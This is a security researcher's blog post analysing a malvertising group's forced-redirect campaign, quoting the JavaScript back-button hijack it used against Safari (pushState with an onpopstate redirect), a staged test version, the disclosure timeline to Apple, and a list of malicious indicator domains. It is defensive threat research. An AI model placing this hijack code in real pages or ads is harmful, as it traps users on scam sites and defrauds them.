Open in app

Sign up

Sign in

Write

Sign up

Sign in

Malvertiser “D-Shortiez” abuses WebKit back button hijack in forced-redirect campaign

Eliya Stein
Confiant
Published in
4 min readFeb 8, 2023

--

Over the last few years, as AdTech and browser security has continued to mature, many malvertisers have moved on from forced redirect campaigns that target premium publishers and top-tier advertising platforms. The ones that are left, however, typically have little tricks that they employ in order to try and achieve some sort of positional advantage in order to optimize their impact and reach.

Today we are looking at part of a payload from a threat actor that we call D-Shortiez. A group that runs forced redirect campaigns that propel victims down familiar malicious click-chains which surface familiar scams like this:

The redirect payload itself consists mainly of largely unremarkable fingerprinting and tracking functions:

When we come across redirect campaigns like this, we like to pay extra attention to the actual redirect mechanics in order to see if anything weird is going on.

Starting on line 211 we see a nested try/catch that attempts the actual forced redirection. This is all fairly standard as different browsers respond differently to different redirect attempts and the bad actors have learned that throwing the kitchen sink at it will maximize the chances of a successful redirection.

The part that made us pause and closely consider what’s happening here are these few lines:

        if (!!(window.top.history && window.top.history.pushState)) {
            window.top.history.pushState(null, null, '');
            window.top.onpopstate = function(event) {
                window.top.location.href = redirectUrl+'back';
            };

A description of the popstate event from MDN:

The popstate event of the Window interface is fired when the active history entry changes while the user navigates the session history. It changes the current history entry to that of the last page the user visited or, if history.pushState() has been used to add a history entry to the history stack, that history entry is used instead.

We staged our own payload for testing as follows and tried it on all the browsers with major marketshare:

redirectUrl = 'http://google.com/search?q=';
if (window.top.history && window.top.history.pushState) {
    window.top.history.pushState(null, null, '');
    window.top.onpopstate = function (event) {
        window.top.location.href = redirectUrl + 'back';
    };
    let u1 = redirectUrl + 'click';
    window.top.document.body.addEventListener('click', function () { window.top.location.href = u1; }, true);
}

We found nothing unusual while testing this snippet in in almost every browser, but something stood out about Safari…

The script very effectively acts as a back button hijack, comparable to some browlock techniques that online scammers have leaned on over the years. Victims are lured to scams and the neutralized back button keeps them from being able to back out of the site.

Impact, Scope, & Targeting

Over the last 6 months, D-Shortiez have served over 300MM malicious ad impressions targeting primarily US audiences with a long tail that trickles down to Canada and Europe.

While activity has been fairly consistent since August, if we look at it on a trend line, we can see some very aggressive sustained bursts, and some breaks in between.

The platform predominantly targeted platform is iOS

Timeline

Sep. 29 — Reported to Apple

Jan. 23 — Addressed with this Safari security update: https://support.apple.com/en-us/HT213600

IOCs

*.v-hi.shop   
*.f-dk.shop  
*.m-fl.shop  
*.b-qv.shop  
*.g-jm.online
*.y-b.online 
*.m-k.homes  
*.p-a.homes  
*.c-b.beauty 
*.q-j.online 
*.d-y.online 
*.v-i.online 
*.k-bd.online
*.s-o.fun    
*.t-n.beauty 
*.v-mh.online
*.a-p.pics   
*.f-f.site   
*.c-b.site   
*.a-f.site   
*.o-b.site   
*.d-f.site   
*.q-h.site   
*.v-n.homes  
*.s-t.website
*.e-g.store  
*.k-g.site   
*.t-i.site   
*.h-k.site   
*.y-m.site   
*.g-c.homes  
*.v-k.site   
*.k-u.site   
*.g-j.site   
*.o-b.shop   
*.v-g.skin   
*.c-g.site   
*.e-t.site   
*.a-z.skin   
*.a-o.homes  
*.v-t.homes  
*.f-p.homes  
*.e-h.homes  
*.j-h.beauty 
*.a-b.beauty 
*.b-c.beauty 
*.f-t.beauty 
*.r-j.pics   
*.w-h.pics   
*.g-e.pics   
*.y-j.pics   
*.n-s.store  
*.w-t.homes  
*.x-y.store  
*.k-j.homes  
*.f-t.skin   
*.j-d.boats  
*.t-y.website
*.s-w.fun    
*.g-o.homes  
*.s-g.boats  
*.n-y.skin   
*.x-u.homes  
*.t-o.beauty 
*.v-e.boats  
*.u-c.cyou   
*.o-b.homes  
*.s-a.homes  
*.s-h.homes  
*.e-p.autos  
*.g-p.pics   
*.q-c.homes  
*.r-k.group  
*.f-o.boats  
*.s-p.autos  
*.t-g.skin   
*.g-j.skin   
*.v-e.cyou   
*.e-q.boats  
*.v-e.homes  
*.c-f.beauty 
*.e-v.boats  
*.a-b.pics   
*.c-c.autos  
*.b-f.beauty 
*.a-o.beauty 
*.e-z.homes  
*.c-d.homes  
*.f-b.boats  
*.c-t.beauty 
*.f-q.autos  
*.c-b.skin   
*.d-e.boats  
*.s-f.homes  
*.a-e.beauty 
*.b-s.boats  
*.d-g.autos  
*.c-a.boats  
*.c-a.cyou
Hacking
Malware
Scam
JavaScript
Marketing

--

--

Eliya Stein
Confiant
Follow

Written by Eliya Stein

267 Followers

Technology, Security, and Blockchain Enthusiast. Security Engineering & Research @ Confiant.

Follow

Help

Status

About

Careers

Blog

Privacy

Terms

Text to speech

Teams